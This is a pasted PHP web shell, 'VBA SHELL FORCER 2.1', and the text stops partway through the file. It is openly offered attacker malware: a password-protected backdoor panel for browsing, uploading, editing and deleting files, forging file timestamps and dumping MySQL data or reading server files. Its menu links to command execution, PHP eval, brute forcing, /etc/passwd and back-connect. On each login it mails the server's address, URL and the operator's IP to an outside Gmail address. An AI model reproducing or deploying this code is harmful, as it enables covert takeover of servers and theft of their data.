· 10 years ago · Nov 02, 2015, 09:18 PM
1 1 <?php
2 2 /****************************************\
3 3 |* VBA SHELL FORCER - VERSION 2.1 *|
4 4 |* Edit & Develop by VBATEAM *|
5 5 |* http://vbateam.net *|
6 6 |* == Hacking & Security == *|
7 7 \****************************************/
8 8 error_reporting(7);
9 9 @set_magic_quotes_runtime(0);
10 10 ob_start();
11 11 $mtime = explode(' ', microtime());
12 12 $starttime = $mtime[1] + $mtime[0];
13 13 define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)) . '/');
14 14 //define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
15 15 define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
16 16 define('IS_COM', class_exists('COM') ? 1 : 0);
17 17 define('IS_GPC', get_magic_quotes_gpc());
18 18 $dis_func = get_cfg_var('disable_functions');
19 19 define('IS_PHPINFO', (!eregi("phpinfo", $dis_func)) ? 1 : 0);
20 20 @set_time_limit(0);
21 21 foreach (array('_GET', '_POST') as $_request) {
22 22 foreach ($$_request as $_key => $_value) {
23 23 if ($_key{0} != '_') {
24 24 if (IS_GPC) {
25 25 $_value = s_array($_value);
26 26 }
27 27 $$_key = $_value;
28 28 }
29 29 }
30 30 }
31 31 /*================= Info Login ================*/
32 32 $admin = array();
33 33 $admin['check'] = true;
34 34 $admin['pass'] = 'byg'; // Password login
35 35 $admin['cookiepre'] = '';
36 36 $admin['cookiedomain'] = '';
37 37 $admin['cookiepath'] = '/';
38 38 $admin['cookielife'] = 86400;
39 39 /*===================== End =====================*/
40 40 if ($charset == 'utf8') {
41 41 header("content-Type: text/html; charset=utf-8");
42 42 } elseif ($charset == 'big5') {
43 43 header("content-Type: text/html; charset=big5");
44 44 } elseif ($charset == 'gbk') {
45 45 header("content-Type: text/html; charset=gbk");
46 46 } elseif ($charset == 'latin1') {
47 47 header("content-Type: text/html; charset=iso-8859-2");
48 48 }
49 49 $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
50 50 $timestamp = time();
51 51 /*===================== Login =====================*/
52 52 if ($action == "logout") {
53 53 scookie('vbapass', '', -86400 * 365);
54 54 p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
55 55 p('<body background=black>');
56 56 exit;
57 57 }
58 58 if ($admin['check']) {
59 59 if ($doing == 'login') {
60 60 if ($admin['pass'] == $password) {
61 61 scookie('vbapass', $password);
62 62 // Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
63 63 $time_shell = "" . date("d/m/Y - H:i:s") . "";
64 64 $ip_remote = $_SERVER["REMOTE_ADDR"];
65 65 $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
66 66 $to_email = 'minhduong.pjn@gmail.com
67 67 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */';
68 68 $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . " - " . $_SERVER['HTTP_HOST'] . "";
69 69 $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " - IP Excuting: $ip_remote - Time: $time_shell";
70 70 $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
71 71 @mail($to_email, $server_mail, $linkcr, $header);
72 72 p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
73 73 p('<body bgcolor=black>
74 74 <BR><BR><div align=center><font color=yellow face=tahoma size=2>BYG - The Legend of Vietnamese Hacker World - Please wait...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
75 75 exit;
76 76 } else {
77 77 $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
78 78 echo $err_mess;
79 79 }
80 80 }
81 81 if ($_COOKIE['vbapass']) {
82 82 if ($_COOKIE['vbapass'] != $admin['pass']) {
83 83 loginpage();
84 84 }
85 85 } else {
86 86 loginpage();
87 87 }
88 88 }
89 89 /*===================== Login =====================*/
90 90 $errmsg = '';
91 91 if ($action == 'phpinfo') {
92 92 if (IS_PHPINFO) {
93 93 phpinfo();
94 94 } else {
95 95 $errmsg = 'phpinfo() function has non-permissible';
96 96 }
97 97 }
98 98 if ($doing == 'downfile' && $thefile) {
99 99 if (!@file_exists($thefile)) {
100 100 $errmsg = 'The file you want Downloadable was nonexistent';
101 101 } else {
102 102 $fileinfo = pathinfo($thefile);
103 103 header('Content-type: application/x-' . $fileinfo['extension']);
104 104 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
105 105 header('Content-Length: ' . filesize($thefile));
106 106 @readfile($thefile);
107 107 exit;
108 108 }
109 109 }
110 110 if ($doing == 'backupmysql' && !$saveasfile) {
111 111 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
112 112 $table = array_flip($table);
113 113 $result = q("SHOW tables");
114 114 if (!$result) p('<h2>' . mysql_error() . '</h2>');
115 115 $filename = basename($_SERVER['HTTP_HOST'] . '_MySQL.sql');
116 116 header('Content-type: application/unknown');
117 117 header('Content-Disposition: attachment; filename=' . $filename);
118 118 $mysqldata = '';
119 119 while ($currow = mysql_fetch_array($result)) {
120 120 if (isset($table[$currow[0]])) {
121 121 $mysqldata.= sqldumptable($currow[0]);
122 122 }
123 123 }
124 124 mysql_close();
125 125 exit;
126 126 }
127 127 // Mysql
128 128 if ($doing == 'mysqldown') {
129 129 if (!$dbname) {
130 130 $errmsg = 'Please input dbname';
131 131 } else {
132 132 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
133 133 if (!file_exists($mysqldlfile)) {
134 134 $errmsg = 'The file you want Downloadable was nonexistent';
135 135 } else {
136 136 $result = q("select load_file('$mysqldlfile');");
137 137 if (!$result) {
138 138 q("DROP TABLE IF EXISTS tmp_angel;");
139 139 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
140 140 //Download SQL
141 141 q("LOAD DATA LOCAL INFILE '" . addslashes($mysqldlfile) . "' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
142 142 $result = q("select content from tmp_angel");
143 143 q("DROP TABLE tmp_angel");
144 144 }
145 145 $row = @mysql_fetch_array($result);
146 146 if (!$row) {
147 147 $errmsg = 'Load file failed ' . mysql_error();
148 148 } else {
149 149 $fileinfo = pathinfo($mysqldlfile);
150 150 header('Content-type: application/x-' . $fileinfo['extension']);
151 151 header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
152 152 header("Accept-Length: " . strlen($row[0]));
153 153 echo $row[0];
154 154 exit;
155 155 }
156 156 }
157 157 }
158 158 }
159 159 ?>
160 160 <html>
161 161 <head>
162 162 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
163 163 <title><?php echo str_replace('.', '', 'BYG - The Legend of Vietnamese Hacker World'); ?></title>
164 164 <style type="text/css">
165 165 body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
166 166
167 167 a {color: #74A202;text-decoration:none;}
168 168 a:hover{color: #f00;text-decoration:underline;}
169 169 .alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
170 170 .alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
171 171 .focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
172 172 .fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
173 173 .fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
174 174 .head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
175 175 .head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
176 176 .head td span{font-weight:normal;}
177 177 form{margin:0;padding:0;}
178 178 h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
179 179 ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
180 180 u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
181 181 input, textarea, button
182 182 {
183 183 font-size: 9pt;
184 184 color: #ccc;
185 185 font-family: verdana, sans-serif;
186 186 background-color: #202020;
187 187 border-left: 1px solid #74A202;
188 188 border-top: 1px solid #74A202;
189 189 border-right: 1px solid #74A202;
190 190 border-bottom: 1px solid #74A202;
191 191 }
192 192 select
193 193 {
194 194 font-size: 8pt;
195 195 font-weight: normal;
196 196 color: #ccc;
197 197 font-family: verdana, sans-serif;
198 198 background-color: #202020;
199 199 }
200 200
201 201 </style>
202 202 <script type="text/javascript">
203 203 function CheckAll(form) {
204 204 for(var i=0;i<form.elements.length;i++) {
205 205 var e = form.elements[i];
206 206 if (e.name != 'chkall')
207 207 e.checked = form.chkall.checked;
208 208 }
209 209 }
210 210 function $(id) {
211 211 return document.getElementById(id);
212 212 }
213 213 function goaction(act){
214 214 $('goaction').action.value=act;
215 215 $('goaction').submit();
216 216 }
217 217 </script>
218 218 </head>
219 219 <body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
220 220
221 221
222 222 <div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
223 223 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
224 224 <tr>
225 225 <td align="center" valign=center>
226 226 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
227 227 Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
228 228 </div>
229 229 </td>
230 230 </tr>
231 231 </table>
232 232 </div>
233 233 <script>
234 234 var ld=(document.all);
235 235 var ns4=document.layers;
236 236 var ns6=document.getElementById&&!document.all;
237 237 var ie4=document.all;
238 238 if (ns4)
239 239 ld=document.loading;
240 240 else if (ns6)
241 241 ld=document.getElementById("loading").style;
242 242 else if (ie4)
243 243 ld=document.all.loading.style;
244 244 function init()
245 245 {
246 246 if(ns4){ld.visibility="hidden";}
247 247 else if (ns6||ie4) ld.display="none";
248 248 }
249 249 </script>
250 250
251 251
252 252
253 253
254 254 <table width="100%" border="0" cellpadding="0" cellspacing="0">
255 255 <tr class="head_small">
256 256 <td width=100%>
257 257 <table width=100%><tr class="head_small"><td width=86px><a title="BYG - The Legend of Vietnamese Hacker World" href="<?php $self; ?>"><img src=http://cB8.upanh.com/19.0.24475887.LHg0/banner.gif height=86 border=0></a></td><td>
258 258 <span style="float:left;"> <?php echo "Hostname: " . $_SERVER['HTTP_HOST'] . ""; ?> | <a href="http://beyeugroup.com" target="_blank"><?php echo str_replace('.', '', 'BYG - The Legend of Vietnamese Hacker World'); ?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />
259 259
260 260 <?php
261 261 $curl_on = @function_exists('curl_version');
262 262 $mysql_on = @function_exists('mysql_connect');
263 263 $mssql_on = @function_exists('mssql_connect');
264 264 $pg_on = @function_exists('pg_connect');
265 265 $ora_on = @function_exists('ocilogon');
266 266 echo (($safe_mode) ? ("Safe_mod: <b><font color=green>ON</font></b> - ") : ("Safe_mod: <b><font color=red>OFF</font></b> - "));
267 267 echo "PHP version: <b>" . @phpversion() . "</b> - ";
268 268 echo "cURL: " . (($curl_on) ? ("<b><font color=green>ON</font></b> - ") : ("<b><font color=red>OFF</font></b> - "));
269 269 echo "MySQL: <b>";
270 270 $mysql_on = @function_exists('mysql_connect');
271 271 if ($mysql_on) {
272 272 echo "<font color=green>ON</font></b> - ";
273 273 } else {
274 274 echo "<font color=red>OFF</font></b> - ";
275 275 }
276 276 echo "MSSQL: <b>";
277 277 $mssql_on = @function_exists('mssql_connect');
278 278 if ($mssql_on) {
279 279 echo "<font color=green>ON</font></b> - ";
280 280 } else {
281 281 echo "<font color=red>OFF</font></b> - ";
282 282 }
283 283 echo "PostgreSQL: <b>";
284 284 $pg_on = @function_exists('pg_connect');
285 285 if ($pg_on) {
286 286 echo "<font color=green>ON</font></b> - ";
287 287 } else {
288 288 echo "<font color=red>OFF</font></b> - ";
289 289 }
290 290 echo "Oracle: <b>";
291 291 $ora_on = @function_exists('ocilogon');
292 292 if ($ora_on) {
293 293 echo "<font color=green>ON</font></b>";
294 294 } else {
295 295 echo "<font color=red>OFF</font></b><BR>";
296 296 }
297 297 echo "Disable functions : <b>";
298 298 if ('' == ($df = @ini_get('disable_functions'))) {
299 299 echo "<font color=green>NONE</font></b><BR>";
300 300 } else {
301 301 echo "<font color=red>$df</font></b><BR>";
302 302 }
303 303 echo "<font color=white>Uname -a</font>: " . @substr(@php_uname(), 0, 120) . "<br>";
304 304 echo "<font color=white>Server</font>: " . @substr($SERVER_SOFTWARE, 0, 120) . " - <font color=white>id</font>: " . @getmyuid() . "(" . @get_current_user() . ") - uid=" . @getmyuid() . " (" . @get_current_user() . ") gid=" . @getmygid() . "(" . @get_current_user() . ")<br>";
305 305 ?>
306 306 </td></tr></table></td>
307 307 </tr>
308 308 <tr class="alt1">
309 309 <td width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>" . gethostbyname($_SERVER['SERVER_NAME']) . "</font>"; ?> - Your IP: <?php echo "<font color=yellow>" . $_SERVER['REMOTE_ADDR'] . "</font>"; ?>] </span> <br />
310 310 --------------------------------------------------------------------------------------<br />
311 311
312 312 <a href="javascript:goaction('file');">File Manager</a> |
313 313 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
314 314 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
315 315 <a href="javascript:goaction('shell');">Execute Command</a> |
316 316 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
317 317 <a href="javascript:goaction('eval');">Eval PHP Code</a>
318 318 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('brute');">Brute</a> <?php
319 319 } ?>
320 320 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php
321 321 } ?>
322 322 <?php if (!IS_WIN) { ?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php
323 323 } ?>
324 324 </td>
325 325 </tr>
326 326 </table>
327 327 <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
328 328 <?php
329 329 formhead(array('name' => 'goaction'));
330 330 makehide('action');
331 331 formfoot();
332 332 $errmsg && m($errmsg);
333 333 // Dir function
334 334 !$dir && $dir = '.';
335 335 $nowpath = getPath(SA_ROOT, $dir);
336 336 if (substr($dir, -1) != '/') {
337 337 $dir = $dir . '/';
338 338 }
339 339 $uedir = ue($dir);
340 340 if (!$action || $action == 'file') {
341 341 // Non-writeable
342 342 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
343 343 // Delete dir
344 344 if ($doing == 'deldir' && $thefile) {
345 345 if (!file_exists($thefile)) {
346 346 m($thefile . ' directory does not exist');
347 347 } else {
348 348 m('Directory delete ' . (deltree($thefile) ? basename($thefile) . ' success' : 'failed'));
349 349 }
350 350 }
351 351 // Create new dir
352 352 elseif ($newdirname) {
353 353 $mkdirs = $nowpath . $newdirname;
354 354 if (file_exists($mkdirs)) {
355 355 m('Directory has already existed');
356 356 } else {
357 357 m('Directory created ' . (@mkdir($mkdirs, 0777) ? 'success' : 'failed'));
358 358 @chmod($mkdirs, 0777);
359 359 }
360 360 }
361 361 // Upload file
362 362 elseif ($doupfile) {
363 363 m('File upload ' . (@copy($_FILES['uploadfile']['tmp_name'], $uploaddir . '/' . $_FILES['uploadfile']['name']) ? 'success' : 'failed'));
364 364 }
365 365 // Edit file
366 366 elseif ($editfilename && $filecontent) {
367 367 $fp = @fopen($editfilename, 'w');
368 368 m('Save file ' . (@fwrite($fp, $filecontent) ? 'success' : 'failed'));
369 369 @fclose($fp);
370 370 }
371 371 // Modify
372 372 elseif ($pfile && $newperm) {
373 373 if (!file_exists($pfile)) {
374 374 m('The original file does not exist');
375 375 } else {
376 376 $newperm = base_convert($newperm, 8, 10);
377 377 m('Modify file attributes ' . (@chmod($pfile, $newperm) ? 'success' : 'failed'));
378 378 }
379 379 }
380 380 // Rename
381 381 elseif ($oldname && $newfilename) {
382 382 $nname = $nowpath . $newfilename;
383 383 if (file_exists($nname) || !file_exists($oldname)) {
384 384 m($nname . ' has already existed or original file does not exist');
385 385 } else {
386 386 m(basename($oldname) . ' renamed ' . basename($nname) . (@rename($oldname, $nname) ? ' success' : 'failed'));
387 387 }
388 388 }
389 389 // Copu
390 390 elseif ($sname && $tofile) {
391 391 if (file_exists($tofile) || !file_exists($sname)) {
392 392 m('The goal file has already existed or original file does not exist');
393 393 } else {
394 394 m(basename($tofile) . ' copied ' . (@copy($sname, $tofile) ? basename($tofile) . ' success' : 'failed'));
395 395 }
396 396 }
397 397 // File exit
398 398 elseif ($curfile && $tarfile) {
399 399 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
400 400 m('The goal file has already existed or original file does not exist');
401 401 } else {
402 402 $time = @filemtime($tarfile);
403 403 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
404 404 }
405 405 }
406 406 // Date
407 407 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
408 408 if (!@file_exists($curfile)) {
409 409 m(basename($curfile) . ' does not exist');
410 410 } else {
411 411 $time = strtotime("$year-$month-$day $hour:$minute:$second");
412 412 m('Modify file the last modified ' . (@touch($curfile, $time, $time) ? 'success' : 'failed'));
413 413 }
414 414 }
415 415 // Download
416 416 elseif ($doing == 'downrar') {
417 417 if ($dl) {
418 418 $dfiles = '';
419 419 foreach ($dl as $filepath => $value) {
420 420 $dfiles.= $filepath . ',';
421 421 }
422 422 $dfiles = substr($dfiles, 0, strlen($dfiles) - 1);
423 423 $dl = explode(',', $dfiles);
424 424 $zip = new PHPZip($dl);
425 425 $code = $zip->out;
426 426 header('Content-type: application/octet-stream');
427 427 header('Accept-Ranges: bytes');
428 428 header('Accept-Length: ' . strlen($code));
429 429 header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . '_Files.tar.gz');
430 430 echo $code;
431 431 exit;
432 432 } else {
433 433 m('Please select file(s)');
434 434 }
435 435 }
436 436 // Delete file
437 437 elseif ($doing == 'delfiles') {
438 438 if ($dl) {
439 439 $dfiles = '';
440 440 $succ = $fail = 0;
441 441 foreach ($dl as $filepath => $value) {
442 442 if (@unlink($filepath)) {
443 443 $succ++;
444 444 } else {
445 445 $fail++;
446 446 }
447 447 }
448 448 m('Deleted file have finished??choose ' . count($dl) . ' success ' . $succ . ' fail ' . $fail);
449 449 } else {
450 450 m('Please select file(s)');
451 451 }
452 452 }
453 453 // Function Newdir
454 454 formhead(array('name' => 'createdir'));
455 455 makehide('newdirname');
456 456 makehide('dir', $nowpath);
457 457 formfoot();
458 458 formhead(array('name' => 'fileperm'));
459 459 makehide('newperm');
460 460 makehide('pfile');
461 461 makehide('dir', $nowpath);
462 462 formfoot();
463 463 formhead(array('name' => 'copyfile'));
464 464 makehide('sname');
465 465 makehide('tofile');
466 466 makehide('dir', $nowpath);
467 467 formfoot();
468 468 formhead(array('name' => 'rename'));
469 469 makehide('oldname');
470 470 makehide('newfilename');
471 471 makehide('dir', $nowpath);
472 472 formfoot();
473 473 formhead(array('name' => 'fileopform'));
474 474 makehide('action');
475 475 makehide('opfile');
476 476 makehide('dir');
477 477 formfoot();
478 478 $free = @disk_free_space($nowpath);
479 479 !$free && $free = 0;
480 480 $all = @disk_total_space($nowpath);
481 481 !$all && $all = 0;
482 482 $used = $all - $free;
483 483 $used_percent = @round(100 / ($all / $free), 2);
484 484 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>' . sizecount($free) . '</font> of <font color=red>' . sizecount($all) . '</font> (<font color=red>' . $used_percent . '</font>%)</font>');
485 485 ?>
486 486 <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
487 487 <form action="" method="post" id="godir" name="godir">
488 488 <tr>
489 489 <td nowrap>Current Directory (<?php echo $dir_writeable; ?>, <?php echo getChmod($nowpath); ?>)</td>
490 490 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath; ?>" type="text" style="width:100%;margin:0 8px;"></td>
491 491 <td nowrap><input class="bt" value="GO" type="submit"></td>
492 492 </tr>
493 493 </form>
494 494 </table>
495 495 <script type="text/javascript">
496 496 function createdir(){
497 497 var newdirname;
498 498 newdirname = prompt('Please input the directory name:', '');
499 499 if (!newdirname) return;
500 500 $('createdir').newdirname.value=newdirname;
501 501 $('createdir').submit();
502 502 }
503 503 function fileperm(pfile){
504 504 var newperm;
505 505 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
506 506 if (!newperm) return;
507 507 $('fileperm').newperm.value=newperm;
508 508 $('fileperm').pfile.value=pfile;
509 509 $('fileperm').submit();
510 510 }
511 511 function copyfile(sname){
512 512 var tofile;
513 513 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
514 514 if (!tofile) return;
515 515 $('copyfile').tofile.value=tofile;
516 516 $('copyfile').sname.value=sname;
517 517 $('copyfile').submit();
518 518 }
519 519 function rename(oldname){
520 520 var newfilename;
521 521 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
522 522 if (!newfilename) return;
523 523 $('rename').newfilename.value=newfilename;
524 524 $('rename').oldname.value=oldname;
525 525 $('rename').submit();
526 526 }
527 527 function dofile(doing,thefile,m){
528 528 if (m && !confirm(m)) {
529 529 return;
530 530 }
531 531 $('filelist').doing.value=doing;
532 532 if (thefile){
533 533 $('filelist').thefile.value=thefile;
534 534 }
535 535 $('filelist').submit();
536 536 }
537 537 function createfile(nowpath){
538 538 var filename;
539 539 filename = prompt('Please input the file name:', '');
540 540 if (!filename) return;
541 541 opfile('editfile',nowpath + filename,nowpath);
542 542 }
543 543 function opfile(action,opfile,dir){
544 544 $('fileopform').action.value=action;
545 545 $('fileopform').opfile.value=opfile;
546 546 $('fileopform').dir.value=dir;
547 547 $('fileopform').submit();
548 548 }
549 549 function godir(dir,view_writable){
550 550 if (view_writable) {
551 551 $('godir').view_writable.value=1;
552 552 }
553 553 $('godir').dir.value=dir;
554 554 $('godir').submit();
555 555 }
556 556 </script>
557 557 <?php
558 558 tbhead();
559 559 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
560 560 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="' . $dir . '" type="hidden" /><input name="dir" value="' . $dir . '" type="hidden" /></div>');
561 561 p('<a href="javascript:godir(\'' . $_SERVER["DOCUMENT_ROOT"] . '\');">WebRoot</a>');
562 562 if ($view_writable) {
563 563 p(' | <a href="javascript:godir(\'' . $nowpath . '\');">View All</a>');
564 564 } else {
565 565 p(' | <a href="javascript:godir(\'' . $nowpath . '\',\'1\');">View Writable</a>');
566 566 }
567 567 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\'' . $nowpath . '\');">Create File</a>');
568 568 if (IS_WIN && IS_COM) {
569 569 $obj = new COM('scripting.filesystemobject');
570 570 if ($obj && is_object($obj)) {
571 571 $DriveTypeDB = array(0 => 'Unknow', 1 => 'Removable', 2 => 'Fixed', 3 => 'Network', 4 => 'CDRom', 5 => 'RAM Disk');
572 572 foreach ($obj->Drives as $drive) {
573 573 if ($drive->DriveType == 2) {
574 574 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Size:' . sizecount($drive->TotalSize) . ' Free:' . sizecount($drive->FreeSpace) . ' Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
575 575 } else {
576 576 p(' | <a href="javascript:godir(\'' . $drive->Path . '/\');" title="Type:' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . '(' . $drive->Path . ')</a>');
577 577 }
578 578 }
579 579 }
580 580 }
581 581 p('</td></tr></form>');
582 582 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
583 583 // Get path
584 584 $dirdata = array();
585 585 $filedata = array();
586 586 if ($view_writable) {
587 587 $dirdata = GetList($nowpath);
588 588 } else {
589 589 // Open dir
590 590 $dirs = @opendir($dir);
591 591 while ($file = @readdir($dirs)) {
592 592 $filepath = $nowpath . $file;
593 593 if (@is_dir($filepath)) {
594 594 $dirdb['filename'] = $file;
595 595 $dirdb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
596 596 $dirdb['dirchmod'] = getChmod($filepath);
597 597 $dirdb['dirperm'] = getPerms($filepath);
598 598 $dirdb['fileowner'] = getUser($filepath);
599 599 $dirdb['dirlink'] = $nowpath;
600 600 $dirdb['server_link'] = $filepath;
601 601 $dirdb['client_link'] = ue($filepath);
602 602 $dirdata[] = $dirdb;
603 603 } else {
604 604 $filedb['filename'] = $file;
605 605 $filedb['size'] = sizecount(@filesize($filepath));
606 606 $filedb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
607 607 $filedb['filechmod'] = getChmod($filepath);
608 608 $filedb['fileperm'] = getPerms($filepath);
609 609 $filedb['fileowner'] = getUser($filepath);
610 610 $filedb['dirlink'] = $nowpath;
611 611 $filedb['server_link'] = $filepath;
612 612 $filedb['client_link'] = ue($filepath);
613 613 $filedata[] = $filedb;
614 614 }
615 615 } // while
616 616 unset($dirdb);
617 617 unset($filedb);
618 618 @closedir($dirs);
619 619 }
620 620 @sort($dirdata);
621 621 @sort($filedata);
622 622 $dir_i = '0';
623 623 foreach ($dirdata as $key => $dirdb) {
624 624 if ($dirdb['filename'] != '..' && $dirdb['filename'] != '.') {
625 625 $thisbg = bg();
626 626 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
627 627 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
628 628 p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>');
629 629 p('<td nowrap>' . $dirdb['mtime'] . '</td>');
630 630 p('<td nowrap>--</td>');
631 631 p('<td nowrap>');
632 632 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / ');
633 633 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>');
634 634 p('<td nowrap><a href="javascript:dofile(\'deldir\',\'' . $dirdb['server_link'] . '\',\'Are you sure will delete ' . $dirdb['filename'] . '? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>');
635 635 p('</tr>');
636 636 $dir_i++;
637 637 } else {
638 638 if ($dirdb['filename'] == '..') {
639 639 p('<tr class=fout>');
640 640 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>');
641 641 p('</tr>');
642 642 }
643 643 }
644 644 }
645 645 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
646 646 p('<form id="filelist" name="filelist" action="' . $self . '" method="post">');
647 647 makehide('action', 'file');
648 648 makehide('thefile');
649 649 makehide('doing');
650 650 makehide('dir', $nowpath);
651 651 $file_i = '0';
652 652 foreach ($filedata as $key => $filedb) {
653 653 if ($filedb['filename'] != '..' && $filedb['filename'] != '.') {
654 654 $fileurl = str_replace(SA_ROOT, '', $filedb['server_link']);
655 655 $thisbg = bg();
656 656 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
657 657 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl[' . $filedb['server_link'] . ']"></td>');
658 658 p('<td><a href="' . $fileurl . '" target="_blank">' . $filedb['filename'] . '</a></td>');
659 659 p('<td nowrap>' . $filedb['mtime'] . '</td>');
660 660 p('<td nowrap>' . $filedb['size'] . '</td>');
661 661 p('<td nowrap>');
662 662 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['filechmod'] . '</a> / ');
663 663 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['fileperm'] . '</a>' . $filedb['fileowner'] . '</td>');
664 664 p('<td nowrap>');
665 665 p('<a href="javascript:dofile(\'downfile\',\'' . $filedb['server_link'] . '\');">Down</a> | ');
